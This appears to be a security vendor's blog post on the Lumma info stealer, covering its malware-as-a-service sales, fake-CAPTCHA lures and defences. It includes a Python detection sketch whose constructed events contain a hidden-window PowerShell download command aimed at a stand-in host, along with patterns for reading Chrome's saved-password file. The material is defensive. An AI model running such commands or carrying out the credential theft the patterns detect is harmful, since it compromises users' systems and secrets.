Lumma – The Emerging Malware-as-a-Service
In the evolving landscape of cyber threats, Lumma has emerged as a notable and concerning malware, especially as its distribution through Malware-as-a-Service (MaaS) grows. It has become a prominent and “trendy” info stealer, commonly spread through phishing and deceptive sites, and it primarily targets sensitive data like passwords, credit card numbers, and account credentials. In this blog post, we take a closer look at Lumma.
What is Lumma malware?
Lumma is an information stealer (info stealer) malware, highly specialized in locating and extracting personal and financial data. It functions by infiltrating a system and sending the extracted information to an external server, often controlled by cybercriminals. The malware has been around for a while but recently gained attention due to a rise in both its prevalence and the number of reported incidents.
Why is Lumma on the rise?
Several factors contribute to Lumma’s growing popularity among threat actors:
Affordability and accessibility: MaaS offers a low-cost entry point for cyber criminals, making sophisticated malware tools like Lumma accessible to anyone with malicious intent.
Simplicity and scalability: Lumma’s configuration is user-friendly, and the attacks require minimal technical skill, allowing perpetrators to “cast a wide net” and indiscriminately target a broad audience.
Effective data collection: Once deployed, Lumma performs a single, high-impact scan of the infected system, capturing passwords, browser data, and cryptocurrency wallet information, particularly from Google Chrome databases.
The MaaS model: making malware accessible
Lumma is commercially available through Malware-as-a-Service platforms, which allow cybercriminals to purchase, configure, and deploy it with ease. MaaS operates across varying levels of sophistication and accessibility, often on dark web forums or specialized marketplaces, many of them Russian-speaking communities on messaging platforms like Telegram. This approach has made the malware accessible to a wider audience, driving down costs and increasing scalability, which in turn has made these attacks more common and impactful.
The tactics and targets of Lumma malware
Lumma’s popularity with MaaS platforms has diversified the types of attackers who utilize it. While initially non-targeted, Lumma is often the first step in broader attacks, used to steal credentials that can be sold or further exploited. Common targets range from general users to high-value targets like executives, where the goal is often to gain access to sensitive corporate data.
Examples of Lumma in action
Lumma typically deploys through websites requiring users to verify they are “human”, tricking them into executing malicious commands under the guise of CAPTCHA verification. In one recent incident, a user was lured through a fake football streaming site to run commands that downloaded Lumma, compromising sensitive data immediately. Cyber security experts in the SamurAI Security Operations Center have created a Sigma rule for detecting Lumma stealer, which can be found on our GitHub here.
How to protect against Lumma
Employing a Security Operations Center (SOC): A well-functioning SOC can quickly identify suspicious behavior, even from legitimate applications. When an unfamiliar program tries to access stored passwords in Chrome or other sensitive data, it raises red flags, allowing for rapid incident response.
User education: Educating employees on safe online practices, such as avoiding suspicious links or untrusted websites, can reduce the likelihood of an accidental malware installation.
Least privilege principle: By restricting administrative permissions, organizations can prevent unauthorized use of tools like PowerShell, which attackers commonly exploit.
Custom detection tools: At NTT Security, we leverage a custom detection tool designed to identify the specific patterns left behind by Lumma. This tool detects known indicators of compromise (IoCs), including server communication trails Lumma uses to relay stolen data back to its operators.
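As an added example (not NTT Security's SamurAI rule or detection tool), the following Python sketch expresses the two behaviours described above, PowerShell launched from the desktop shell after a fake CAPTCHA lure and a non-browser process reading Chrome's saved-password database, as Sigma-style field matchers and runs them over constructed Sysmon-style events. The field names (Image, ParentImage, CommandLine, TargetFilename), Event IDs, regexes and sample paths are assumptions, not values from the post or the published rule.

```python
"""Minimal Sigma-style matcher for the two Lumma behaviours the post describes.
Added example, not the SamurAI rule; field names follow Sysmon naming and all
sample events below are constructed, not captured from an incident."""
import re

# Rule 1: a fake "verify you are human" page gets the victim to paste a command
# into PowerShell, so PowerShell runs as a child of explorer.exe with a command
# line that pulls remote content. Rule 2: a process other than Chrome reads
# Chrome's saved-password database (Login Data).
RULES = [
    {"title": "PowerShell spawned from explorer fetching remote content",
     "event_id": 1,
     "all": {"Image": r"(?i)\\powershell\.exe$", "ParentImage": r"(?i)\\explorer\.exe$"},
     "any": {"CommandLine": [r"(?i)https?://", r"(?i)-w(indowstyle)?\s+hidden"]}},
    {"title": "Non-browser process accessing Chrome Login Data",
     "event_id": 11,
     "all": {"TargetFilename": r"(?i)\\Google\\Chrome\\User Data\\.*\\Login Data$"},
     "none": {"Image": r"(?i)\\chrome\.exe$"}},
]

def rule_matches(rule, event):
    """True if the Event ID agrees, every 'all' field matches, each 'any' field
    has at least one matching pattern, and no 'none' field matches."""
    if event.get("EventID") != rule["event_id"]:
        return False
    if not all(re.search(p, event.get(f, "")) for f, p in rule.get("all", {}).items()):
        return False
    if not all(any(re.search(p, event.get(f, "")) for p in pats)
               for f, pats in rule.get("any", {}).items()):
        return False
    return not any(re.search(p, event.get(f, "")) for f, p in rule.get("none", {}).items())

def detect(events):
    """Return (rule title, Image) pairs for every event that fires a rule."""
    return [(r["title"], e["Image"]) for e in events for r in RULES if rule_matches(r, e)]

# Constructed telemetry: benign PowerShell, lure-style PowerShell, Chrome reading
# its own store, and an unknown binary in Temp reading the same file.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOGIN_DATA = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Date"},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden Invoke-WebRequest https://example.invalid/captcha"},
    {"EventID": 11, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": LOGIN_DATA},
    {"EventID": 11, "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetFilename": LOGIN_DATA},
]
```

Running detect(SAMPLE_EVENTS) flags only the second and fourth events; the benign PowerShell use and Chrome's own file access pass through, which is the distinction a SOC analyst needs the rule to make.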
At NTT Security, we are committed to helping businesses understand Lumma’s behavior and to employing advanced detection tools so they can protect themselves effectively against this growing threat. Our SamurAI Managed Detection and Response (MDR) service provides companies with expert security monitoring and detection, allowing them to focus on their core business activities.
Contact us to learn how we can help protect your business from Lumma malware.